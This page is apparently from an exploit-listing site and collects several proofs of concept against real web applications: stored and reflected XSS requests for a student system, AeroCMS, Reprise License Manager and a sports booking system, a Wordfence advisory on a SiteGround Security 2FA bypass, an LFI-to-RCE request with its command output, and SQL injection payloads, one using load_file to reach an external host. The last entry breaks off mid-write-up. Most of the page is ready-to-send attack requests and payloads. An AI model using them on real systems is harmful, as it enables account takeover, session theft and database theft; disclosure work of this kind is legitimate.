Latest exploits :: CodePwn

<pre><code># sms-Add_Student-Stored_XSS-POC # Author: D4rkP0w4r Description => Stored_XSS at Add Student # Step to Reproduct * Login to admin -> Students -> Add Student -> input payload <img/src/onerror=prompt(10)> at Enter Name # Exploit * Input payload at Enter Name -> clicked Add Students -> access All Student -> The XSS will trigger * Log out admin and typed roll number -> The XSS will trigger # Vulnerable Code * When inserting into the database, the input is not filtered out bad characters # POC * Injection Point ------WebKitFormBoundaryAvKt9LM2RnnkuA0K Content-Disposition: form-data; name="name" <img/src/onerror=prompt(10)> * Request POST /sms/admin/addstudent.php HTTP/1.1 Host: localhost:8080 Content-Length: 992 Cache-Control: max-age=0 sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="99" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 Origin: http://localhost:8080 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAvKt9LM2RnnkuA0K User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost:8080/sms/admin/addstudent.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=p440fhd7svqid5f063i3epg29k Connection: close ------WebKitFormBoundaryAvKt9LM2RnnkuA0K Content-Disposition: form-data; name="image"; filename="car.png" Content-Type: application/octet-stream ------WebKitFormBoundaryAvKt9LM2RnnkuA0K Content-Disposition: form-data; name="rollno" 1234567 ------WebKitFormBoundaryAvKt9LM2RnnkuA0K Content-Disposition: form-data; name="name" <img/src/onerror=prompt(10)> ------WebKitFormBoundaryAvKt9LM2RnnkuA0K Content-Disposition: form-data; name="contact" 123456 ------WebKitFormBoundaryAvKt9LM2RnnkuA0K Content-Disposition: form-data; name="standerd" 1 ------WebKitFormBoundaryAvKt9LM2RnnkuA0K Content-Disposition: form-data; name="city" Newyork ------WebKitFormBoundaryAvKt9LM2RnnkuA0K Content-Disposition: form-data; name="email" haha@gmail.com ------WebKitFormBoundaryAvKt9LM2RnnkuA0K Content-Disposition: form-data; name="gender" male ------WebKitFormBoundaryAvKt9LM2RnnkuA0K Content-Disposition: form-data; name="submit" ------WebKitFormBoundaryAvKt9LM2RnnkuA0K-- </code></pre>

<pre><code># AeroCMS-Comment-Stored_XSS-POC # Author: D4rkP0w4r * Note => Don't need register or login account * Description => Stored_XSS at comment box ## Step to Reproduct * Click Read More -> input payload <img/src/onerror=prompt(10)> at Author -> click Submit button # Exploit * Input payload at Author -> click Submit button * When admin login to admin panel and click Comments -> The XSS will trigger * Finally, Success !!!! # Vulnerable Code * view_all_comments.php * Stored xss in comment section * Impact is to get the cookie and execute the js code in the admin panel * Because Comments are displayed in admin panel * post.php * No encoding is implemented when inserting data to database # POC * Injection Point comment_author=%3Cimg%2Fsrc%2Fonerror%3Dprompt%2810%29%3E&comment_email=bin%40gmail.com&comment_content=hacked&create_comment= * Request POST /AeroCMS/post.php?p_id=36 HTTP/1.1 Host: localhost:8080 Content-Length: 126 Cache-Control: max-age=0 sec-ch-ua: "Chromium";v="95", ";Not A Brand";v="99" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 Origin: http://localhost:8080 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost:8080/AeroCMS/post.php?p_id=36 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=loqbt1ibs376hge1s415srq441 Connection: close comment_author=%3Cimg%2Fsrc%2Fonerror%3Dprompt%2810%29%3E&comment_email=bin%40gmail.com&comment_content=hacked&create_comment= POC VIDEO https://drive.google.com/file/d/1GxOyX1JkG0trfdaCLfe06TR6WLIGoUXE/view?usp=sharing ---- # AeroCMS-Add_Posts-Stored_XSS-Poc * Description => Stored_XSS at Post Title ## Step to Reproduct * Login to admin panel -> Posts -> Add Posts -> Post Title -> inject payload <img/src/onerror=prompt(10)> -> The XSS will trigger when clicked Edit Post button ## Vulnerable Code * add_post.php When inserting into the database, the input is not filtered out of html characters * post.php Even when displaying, the entity cannot be properly encoded ------------------------------------------------------------- # POC * Injection Point -----------------------------85448121341942511952219062291 Content-Disposition: form-data; name="post_title" <img/src/onerror=prompt(10)> * Request POST http://localhost:8080/AeroCMS/admin/posts.php?source=edit_post&p_id=26 HTTP/1.1 Host: localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------85448121341942511952219062291 Content-Length: 1101 Origin: http://localhost:8080 Connection: keep-alive Referer: http://localhost:8080/AeroCMS/admin/posts.php?source=edit_post&p_id=26 Cookie: Phpstorm-6b6ba5ee=79a50460-3b02-4cde-a5a4-ff6883c16a7b; PHPSESSID=ndh6ks953tmha1ps8cfp4bplf2 Upgrade-Insecure-Requests: 1 -----------------------------85448121341942511952219062291 Content-Disposition: form-data; name="post_title" <img/src/onerror=prompt(10)> -----------------------------85448121341942511952219062291 Content-Disposition: form-data; name="post_category_id" 1 -----------------------------85448121341942511952219062291 Content-Disposition: form-data; name="post_user" admin -----------------------------85448121341942511952219062291 Content-Disposition: form-data; name="post_status" published -----------------------------85448121341942511952219062291 Content-Disposition: form-data; name="image"; filename="" Content-Type: application/octet-stream -----------------------------85448121341942511952219062291 Content-Disposition: form-data; name="post_tags" 1 -----------------------------85448121341942511952219062291 Content-Disposition: form-data; name="post_content" 111 -----------------------------85448121341942511952219062291 Content-Disposition: form-data; name="update_post" Edit Post -----------------------------85448121341942511952219062291-- POC VIDEO https://drive.google.com/file/d/1kMGPBLKgefvKZj34QxDlPTxXdcT0kRR_/view?usp=sharing </code></pre>

<pre><code>Multiple Vulnerabilities in Reprise License Manager 14.2 Credit: Giulia Melotti Garibaldi ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// # Product: RLM 14.2 # Vendor: Reprise Software # CVE ID: CVE-2022-28363 # Vulnerability Title: Reflected Cross-Site Scripting # Severity: Medium # Author(s): Giulia Melotti Garibaldi # Date: 2022-03-29 # ############################################################# Introduction: Reprise License Manager 14.2 is affected by a reflected cross-site scripting vulnerability (XSS) in the /goform/login_process "username" parameter via GET. No authentication is required. Vulnerability PoC: GET http://HOST:5054/goform/login_process?username=admin<script>alert("1")</script><script>alert("1")</script>&password=admin&ok=LOGIN HTTP/1.1 Host: HOST:5054 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 38 Origin: http://HOST:5054 Connection: keep-alive Referer: http://HOST:5054/goform/login_process ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// # Product: RLM 14.2 # Vendor: Reprise Software # CVE ID: CVE-2022-28364 # Vulnerability Title: Authenticated Reflected Cross-Site Scripting # Severity: Low # Author(s): Giulia Melotti Garibaldi # Date: 2022-03-29 # ############################################################# Introduction: Reprise License Manager 14.2 is affected by a reflected cross-site scripting vulnerability (XSS) in the /goform/rlmswitchr_process "file" parameter via GET. Authentication is required. Vulnerability PoC: GET http://HOST:5054/goform/rlmswitchr_process?file=<script>alert("1")</script> HTTP/1.1 Host: HOST:5054 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Origin: http://HOST:5054 Connection: keep-alive Referer: http://HOST:5054/goforms/rlmswitchr Cookie: REDACTED ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// # Product: RLM 14.2 # Vendor: Reprise Software # CVE ID: CVE-2022-28365 # Vulnerability Title: Unauthenticated Information Disclosure # Severity: Low # Author(s): Giulia Melotti Garibaldi # Date: 2022-03-29 # ############################################################# Introduction: Reprise License Manager 14.2 is affected by an Information Disclosure vulnerability via a GET request to /goforms/rlminfo. No authentication is required. The information disclosed is associated with software versions, process IDs, network configuration, hostname(s), system architecture and file/directory information. Vulnerability PoC: GET http://HOST:5054/goforms/rlminfo HTTP/1.1 Host: HOST:5054 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Connection: keep-alive Content-Length: 0 ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// </code></pre>

<pre><code>Description: Authentication Bypass via 2-Factor Authentication Setup Affected Plugin: SiteGround Security Plugin Slug: sg-security Plugin Developer: SiteGround Affected Versions: <= 1.2.5 CVE ID: CVE-2022-0992 CVSS Score: 9.8 (Critical) CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H Researcher/s: Chloe Chamberland Fully Patched Version: 1.2.6 SiteGround Security is a plugin designed to enhance the security of WordPress installations via several features like login security including 2FA, general WordPress hardening, activity monitoring, and more. It’s also worth noting that it comes pre-installed on all SiteGround hosted WordPress sites. Unfortunately, the 2FA functionality of the plugin was insecurely implemented making it possible for unauthenticated attackers to gain access to privileged accounts. When two-factor authentication is enabled, it requires all administrative and editor users to set-up two factor authentication. This requirement is triggered when the site's administrative and editor users log into the site for the first time after 2FA has been enabled at which time they are prompted to configure 2FA for their account. This means that there will be a period of time between 2FA being enabled on a site and each user configuring it for the account. During this interim period, attackers could hijack the 2FA set-up process. The plugin had a flaw that made it so that attackers could completely bypass the first step of authentication, which requires a username and password, and access the 2FA set-up page for users that had not configured 2FA yet. It was as simple as supplying the user ID they would like to compromise via the sg-user-id parameter, along with a few other parameters to indicate that they would like to trigger the initial 2FA configuration process. The following validate_2fa_login() function shows the process by which a user-supplied ID is validated. If the results from the check_authentication_code() function and the sg_security_2fa_configured user meta retuned false, which indicated that 2FA hasn’t yet been configured for that user, then the plugin would load the 2fa-initial-setup-form.php template which displays the QR code and 2FA secret needed to configure the authenticator app for the user supplied ID. [Please view the code snippet on our blog here. (https://email.wordfence.com/e3t/Ctc/GC+113/cwG7R04/VVv8XH4Dtx6JW4ZScBw4MDnfnW7TctdS4HBVbXN3rtP5V5js6pV3Zsc37CgZbDW5wrR-w7zY7KhW4Mrm4c5Zy32dW8XHhsP3P3WvbW1y7vnb2Lz_yCW3h74mS5vGQlSW1TtcL79kYcBBW6cPLyq42thMcW6CwF5w64p8MWW8SMZYL7Ry-RVW72ZMh97N4zYLW6GgBkG2wR-9mW7-b3XP3BhX0qVFdjjZ7wRBZ1W41BHlZ7HXk4_W8gYcdC6jDCSYW7WrVW87zzlt6N3b84wQv3fMrW80zd5s8mFpr_W51NSZ988d_tMN3fRrg4mwDrfW6wrQ9H20MzKyW5chZKt59ZMQgW3mYpHp6XGDWWW81vjKm3DmQR9W86m5dc4X9LfMW3xYLTr441yX1W7x5YyR2gML9GW2ByWtF3NzNmzVGmQWX7Syqr9W7pfbrH7-fqv_W8sJj6l6JnsplW65b1k86jYkVB36K61 ) ] 2FA-Initial Setup (https://email.wordfence.com/e3t/Ctc/GC+113/cwG7R04/VVv8XH4Dtx6JW4ZScBw4MDnfnW7TctdS4HBVbXN3rtP5V5js6pV3Zsc37CgZbDW5wrR-w7zY7KhW4Mrm4c5Zy32dW8XHhsP3P3WvbW1y7vnb2Lz_yCW3h74mS5vGQlSW1TtcL79kYcBBW6cPLyq42thMcW6CwF5w64p8MWW8SMZYL7Ry-RVW72ZMh97N4zYLW6GgBkG2wR-9mW7-b3XP3BhX0qVFdjjZ7wRBZ1W41BHlZ7HXk4_W8gYcdC6jDCSYW7WrVW87zzlt6N3b84wQv3fMrW80zd5s8mFpr_W51NSZ988d_tMN3fRrg4mwDrfW6wrQ9H20MzKyW5chZKt59ZMQgW3mYpHp6XGDWWW81vjKm3DmQR9W86m5dc4X9LfMW3xYLTr441yX1W7x5YyR2gML9GW2ByWtF3NzNmzVGmQWX7Syqr9W7pfbrH7-fqv_W8sJj6l6JnsplW65b1k86jYkVB36K61 ) The returned QR code and secret key are the only things needed to connect the user account with an authentication mechanism, such as Google Authenticator. Attackers were able to use this to connect their authentication app with the account and successfully use a code to pass the “second factor of authentication.” This function would then set the user authentication cookies via the wp_set_auth_cookie() function using the user supplied ID from the sg-user-id parameter which effectively logs the attacker in as that user. Due to the default configuration of the plugin, this account would most likely be a privileged user like an administrator or editor. It’s also worth noting that the function returns the back-up codes which could be used via the weakness outlined in the next section. To sum it up, there was no validation on the validate_2fa_login() function that the identity a user was claiming was in fact legitimate. As such attackers could bypass the first authentication mechanism, a username/password pair, which is meant to prove identity and successfully log in, due to a weakness in the second authentication mechanism, the 2FA process. When successful, an attacker could completely infect a site by exploiting this vulnerability. Description: Authorization Weakness to Authentication Bypass via 2-Factor Authentication Back-up Codes Affected Plugin: SiteGround Security Plugin Slug: sg-security Plugin Developer: SiteGround Affected Versions: <= 1.2.4 CVE ID: CVE-2022-0993 CVSS Score: 8.1 (High) CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H Researcher/s: Chloe Chamberland Fully Patched Version: 1.2.6 In addition to the above outlined vulnerability, the method in which 2FA back-up code authentication was handled made it possible for attackers to log in if they were able to brute force a back-up code for a user or compromise it via other means such as SQL Injection. Diving deeper, the plugin registered the validate_2fabc_login() function which validated the supplied backup code through the validate_backup_login() function using the user supplied user ID from the sg-user-id parameter along with the back-up code supplied via the sgc2fabackupcode parameter. If the back-up code was found in the array of stored back-up codes for that user, then the function would use the wp_set_auth_cookie() function to set the authentication cookies for the supplied user ID. If that user ID belonged to an administrator, the attacker would effectively be logged in as an administrator. [Please view the code snippet on our blog here. (https://email.wordfence.com/e3t/Ctc/GC+113/cwG7R04/VVv8XH4Dtx6JW4ZScBw4MDnfnW7TctdS4HBVbXN3rtP5V5js6pV3Zsc37CgZbDW5wrR-w7zY7KhW4Mrm4c5Zy32dW8XHhsP3P3WvbW1y7vnb2Lz_yCW3h74mS5vGQlSW1TtcL79kYcBBW6cPLyq42thMcW6CwF5w64p8MWW8SMZYL7Ry-RVW72ZMh97N4zYLW6GgBkG2wR-9mW7-b3XP3BhX0qVFdjjZ7wRBZ1W41BHlZ7HXk4_W8gYcdC6jDCSYW7WrVW87zzlt6N3b84wQv3fMrW80zd5s8mFpr_W51NSZ988d_tMN3fRrg4mwDrfW6wrQ9H20MzKyW5chZKt59ZMQgW3mYpHp6XGDWWW81vjKm3DmQR9W86m5dc4X9LfMW3xYLTr441yX1W7x5YyR2gML9GW2ByWtF3NzNmzVGmQWX7Syqr9W7pfbrH7-fqv_W8sJj6l6JnsplW65b1k86jYkVB36K61 ) ] Similarly to the previous vulnerability, the issue here is that there was no true identity validation for the authentication, which indicates an authorization weakness. The function performed no checks to verify that a user had previously authenticated prior to entering the 2FA back-up code, and as such they did not need to legitimately log in prior to being logged in while using a back-up code. This meant that there were no checks to validate that a user was authorized to use a back-up code to perform the second factor of authentication that would log them in. Though the risk in this case is lower, the backup codes were 8 digits long and entirely numeric, so an attacker could potentially brute force one of the 8 back-up codes and automatically be logged in without knowing a username and password combination for an administrative user. While this might not be practical to attempt on most servers, a patient adversary attacking a well-provisioned server capable of processing a large number of requests at once would have a high chance of eventually gaining access unless the brute force attempts were stopped by another mechanism, such as the Wordfence plugin’s built-in brute force protection or rate limiting rules. Further, this vulnerability could be used in conjunction with another vulnerability, such as SQL injection, where an attacker would be able to compromise the 2FA back-up codes that are stored in the database and then subsequently use them to log in without needing to crack the password of an administrative user which would likely be significantly stronger. In both cases, the impact would be significant as an attacker could gain administrative access to the compromised WordPress site which could be used for complete site infection. An Important Security Reminder: Audit Your WordPress Site's User Accounts This vulnerability serves as an important reminder to audit your WordPress site's user accounts. This means identifying any old and unused user accounts that have been inactive for an extended period of time and/or are likely to never be used again and removing them or completely stripping the user's capabilities. This vulnerability could easily be exploited on sites where the site owner enabled 2FA, which is required for all administrative and editor users, and had old inactive administrative/editor user accounts on the site that an attacker could target. Considering accounts that are no longer active are unlikely to log in after the 2FA setting has been enabled, the 2FA for those accounts would not be configured leaving the site ripe for exploitation by any attackers exploiting the vulnerability. A situation involving a similar security issue involving insecure 2FA was reported by the CISA in conjunction with the FBI a few weeks ago (https://email.wordfence.com/e3t/Ctc/GC+113/cwG7R04/VVv8XH4Dtx6JW4ZScBw4MDnfnW7TctdS4HBVbXN3rtP6N3kWF5V1-WJV7Cg-j9W3-nvtq4C7KHBW40PfMb4MYPJbW1Q5kSc6V4L5qW6KLQRC2q1f1GW1sJ8Sc8FpjgyVMxbKf8wRgS5W7SJm5X3BMZ7pW7c1gB85kW6R5W7_1vH12JVyxfW2bvpn47y1jCwW4bGJCj8Yr_J9W6G15j12562xnW1JGqmS9htnJ4W92Hm456nf8mmW5HYmmj8PQ_-XN6yRnxTWHvr1W2Rcg0C9bjZbQVldvV225B_SNVn14Rz8yQJNNW9361-n6Z0KSqW7qysVm5djVCLW7S8dFb3p268N35ns1 ) , around the same time we discovered this vulnerability. In the Cybersecurity Advisory (CSA) by the CISA, it was disclosed that a threat actor was able to successfully brute force a dormant user's account credentials, and due to a default 2FA setting that would allow dormant users to re-enroll a new device for 2FA during the next active log in, the threat actor was able to connect the 2FA secret to their own account and retrieve the code needed to pass the second factor of authentication. Once the threat actor gained initial access to the system they were able to escalate their privileges by exploiting the “PrintNightmare” vulnerability, which you can read more about here (https://email.wordfence.com/e3t/Ctc/GC+113/cwG7R04/VVv8XH4Dtx6JW4ZScBw4MDnfnW7TctdS4HBVbXN3rtP7Z3kWGhV1-WJV7CgB7nVd4Vn790XT8mW5fLrl94CwHLyN4SY-BCgMPx2W2J0HKM95hFGZW5kH7TY8xmV9XW3cvgng2RnjHgW3WnWKM11J-SYMMsWWClb6SsN7tCYmV8HVLWW94cbjz2Y59FZW3m_y6X3frj2NW2qylmN1v_rd3W7G52q37Z04l1W358br17nn8CKN2WZXm3WsfBMW7Q0j7B62HsDkW1c91Wl13XylvW4K2Z2j4pFcsrW69shJz7SLQqtW56-6sG22ZvKzW4-wHXt2r-t_JN8lF8ZMCw9ryW3Cp1M85939QWW5kcNj98w0_VSW1gjfmD2sHZcMVPGSHC7_28pwW1GTLkd82-ytmW973xZ_5mvdNmW5Y0pyZ2YkCrLW31vbQf1Gn9hY36mT1 ) , and steal sensitive information from across the organization's network. This goes to show that attackers are definitely looking for flaws like the one disclosed today to exploit and any site can be a target. As such, it's important to actively maintain and validate the security of your site through regularly performed professional or self-conducted security audits and penetration tests, which is a service Wordfence provides (https://email.wordfence.com/e3t/Ctc/GC+113/cwG7R04/VVv8XH4Dtx6JW4ZScBw4MDnfnW7TctdS4HBVbXN3rtP6N3kWF5V1-WJV7Cg-S6W7JPXRK7CbvvTW79tFY751pMcjN6MxMTf2wTd6W80YKYD36-Z5NMnKkDHfsZtmN23Pf3-Xvb1GN6yHj8fHYYYRW9cdrHs11b_2pW6_-ZSP1JQZ_PW8DVt5k5JYlK4W3BKzMg6Ch8PmW6bKv4s6Q5PJ8W66Hj7T3cdzDZW5QQjDC9k9mhLW5zbDpn70cpTTW3g6Cy75Ndf9yW4LXgkz17NVxhW4l0Qhz3KwfjkW7SDrh888kb4HW2N_kfl61WZK2W4v5s3z8BJz6LW4q2d0j359Lnj36-C1 ) . Security is an active and continuous process. Timeline March 10, 2022 – Conclusion of the plugin analysis that led to the discovery of two Authentication Bypass Vulnerabilities in the “SiteGround Security” WordPress plugin. We deploy firewall rules to protect Wordfence Premium, Wordfence Care, and Wordfence Response users. We send the full disclosure details to SiteGround in accordance with their responsible disclosure policy. March 11, 2022 – The CTO of SiteGround responds indicating that a patch has been released. We review the patch and inform them that it is insufficient. They release an additional patch. March 11, 2022 – A patched version of the plugin is released as version 1.2.3. We suggest further security enhancements to the functionality. March 16, 2022 – An update is made that reduces the security of the 2FA functionality, we follow-up again to suggest better security enhancements to the functionality. The CTO assures us that they are working on it. April 7, 2022 – A fully and optimally patched version of the plugin is released as version 1.2.6. April 9, 2022 – Wordfence Free users receive the firewall rules. Conclusion In today’s post, we detailed a flaw in the “SiteGround Security” plugin that made it possible for unauthenticated attackers to gain access to administrative user accounts in instances where 2-Factor Authentication was enabled, though not yet fully set up, and in cases where an attacker could successfully brute force a back-up code. This could easily be used by an attacker to completely compromise a site. These flaws have been fully patched in version 1.2.6. We strongly recommend ensuring that your site has been updated to the latest patched version of “SiteGround Security”, which is version 1.2.6 at the time of this publication. </code></pre>

<pre><code>Title: Online Sports Complex Booking System 1.0 XSS Author: Zllggggg Vendor: https://www.sourcecodester.com/php/15236/online-sports-complex-booking-system-phpmysql-free-source-code.html Software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/scbs_1.zip Reference: https://github.com/playZG/Exploit-/blob/main/Online%20Sports%20Complex%20Booking%20System/Online%20Sports%20Complex%20Booking%20System%201.0%20XSS%20loophole.md Tested on: Windows, MySQL, Apache Description: When registering users at the front desk, when we fill in the information, we use burpsuite to catch the data packet,After obtaining the data packet, modify the email parameter to <script>alert(1)</script> then send the packet,Then log in to the background with the administrator account ,Click registered clients to trigger the pop-up window Data packet POST /scbs/classes/Users.php?f=save_client HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------289647566033806702832762971625 Content-Length: 1284 Origin: http://localhost Connection: close Referer: http://localhost/scbs/register.php Cookie: PHPSESSID=trkbdt4th4hlsp7bpriuih1816 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------289647566033806702832762971625 Content-Disposition: form-data; name="id" 1 -----------------------------289647566033806702832762971625 Content-Disposition: form-data; name="firstname" ca -----------------------------289647566033806702832762971625 Content-Disposition: form-data; name="middlename" ca -----------------------------289647566033806702832762971625 Content-Disposition: form-data; name="lastname" ca -----------------------------289647566033806702832762971625 Content-Disposition: form-data; name="gender" Male -----------------------------289647566033806702832762971625 Content-Disposition: form-data; name="contact" ca -----------------------------289647566033806702832762971625 Content-Disposition: form-data; name="address" ca -----------------------------289647566033806702832762971625 Content-Disposition: form-data; name="email" <script>alert(1)</script> -----------------------------289647566033806702832762971625 Content-Disposition: form-data; name="password" 123 -----------------------------289647566033806702832762971625 Content-Disposition: form-data; name="img"; filename="" Content-Type: application/octet-stream -----------------------------289647566033806702832762971625-- </code></pre>

<pre><code># Title: School Club Application System 1.0 LFI To RCE # Author: Hejap Zairy # Date: 08.04.2022 # Vendor: https://www.sourcecodester.com/php/15266/school-club-application-system-phpoop-free-source-code.html # Software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/scas_0.zip # Reference: https://github.com/Matrix07ksa # Tested on: Windows, MySQL, Apache #vulnerability Code php Needs more filtering require_once ``` <?php require_once('config.php'); $page = isset($_GET['page']) ? $_GET['page'] : 'home'; $page_name = explode("/",$page)[count(explode("/",$page)) -1]; ?> ``` [+] Payload GET ``` GET /scas/?page=../../0day&515=dir HTTP/1.1 Host: 0day.gov Cache-Control: max-age=0 sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="99" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: ar,en-US;q=0.9,en;q=0.8 Cookie: PHPSESSID=edh1ho9c9skog6v2ns0n0j3f2k Connection: close ``` #Status: CRITICAL #Response ``` HTTP/1.1 200 OK Date: Fri, 08 Apr 2022 04:05:58 GMT Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27 X-Powered-By: PHP/7.4.27 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 13563 </h1> .. .. 0day Page </div> </div> </div> </div> </header> <div class="card card-body blur shadow-blur mx-3 mx-md-4 mt-n6"> Volume in drive C is OS Volume Serial Number is 2EF1-9DCA Directory of C:\xampp\htdocs\scas 04/08/2022 06:27 AM <DIR> . 04/08/2022 06:27 AM <DIR> .. 03/19/2021 01:17 PM 225 .htaccess 04/07/2022 10:03 AM 2,115 about.html 03/30/2022 04:31 PM 220 about.php 04/07/2022 03:56 PM <DIR> admin 04/08/2022 06:27 AM <DIR> assets 03/29/2022 04:17 PM <DIR> classes 04/07/2022 03:20 PM <DIR> clubs 04/07/2022 04:33 PM <DIR> club_admin 04/07/2022 02:39 PM <DIR> club_contents 03/30/2022 10:03 AM 1,297 config.php 04/07/2022 05:13 PM <DIR> database 03/30/2022 04:31 PM 256 home.php 03/29/2022 10:24 AM <DIR> includes 04/07/2022 03:18 PM 3,010 index.php 04/07/2022 09:35 AM 647 initialize.php 04/07/2022 08:18 AM <DIR> uploads 04/07/2022 10:03 AM 1,842 welcome.html 8 File(s) 9,612 bytes 11 Dir(s) 81,520,218,112 bytes free </div> ``` # Description: Local File Inclusion is an attack technique in which attackers trick a web application into either running or exposing files on a web server or execution file If converted rce # Proof and Exploit: https://i.imgur.com/3MbzZuQ.png https://i.imgur.com/mqXb1Mc.png </code></pre>

<pre><code>## Title: School Club Application System v1.0 SQLi ## Author: nu11secur1ty ## Date: 04.07.2022 ## Vendor: https://www.sourcecodester.com/users/tips23 ## Software: https://www.sourcecodester.com/php/15266/school-club-application-system-phpoop-free-source-code.html ## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/School-Club-Application ## Description: The `id` parameter appears to be vulnerable to three types of SQL injection attacks. The payload '+(select load_file('\\\\8dmu6ajx1qrgicpg5fp5d8637udn1gp7svjia6z.sourcecodester.com/php/15266/school-club-application-system-phpoop-free-source-code.html\\slr'))+' was submitted in the id parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. The attacker can take administrator account control and also of all accounts on this system, also the malicious user can download all information about this system. Status: CRITICAL [+] Payloads: ```mysql --- Parameter: id (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT) Payload: page=clubs/view_details&id=2'+(select load_file('\\\\8dmu6ajx1qrgicpg5fp5d8637udn1gp7svjia6z.sourcecodester.com/php/15266/school-club-application-system-phpoop-free-source-code.html\\slr'))+'' OR NOT 2914=2914-- erOW Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: page=clubs/view_details&id=2'+(select load_file('\\\\8dmu6ajx1qrgicpg5fp5d8637udn1gp7svjia6z.sourcecodester.com/php/15266/school-club-application-system-phpoop-free-source-code.html\\slr'))+'' OR (SELECT 2308 FROM(SELECT COUNT(*),CONCAT(0x7176787a71,(SELECT (ELT(2308=2308,1))),0x717a6b7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VAfL Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: page=clubs/view_details&id=2'+(select load_file('\\\\8dmu6ajx1qrgicpg5fp5d8637udn1gp7svjia6z.sourcecodester.com/php/15266/school-club-application-system-phpoop-free-source-code.html\\slr'))+'' AND (SELECT 8537 FROM (SELECT(SLEEP(5)))TWcu)-- jivn Type: UNION query Title: Generic UNION query (NULL) - 8 columns Payload: page=clubs/view_details&id=2'+(select load_file('\\\\8dmu6ajx1qrgicpg5fp5d8637udn1gp7svjia6z.sourcecodester.com/php/15266/school-club-application-system-phpoop-free-source-code.html\\slr'))+'' UNION ALL SELECT CONCAT(0x7176787a71,0x7468764e617048694a74717a4f53734a6956786e7a4a56774b48427a7645474c414847756f704641,0x717a6b7a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- - --- ``` ## Reproduce: 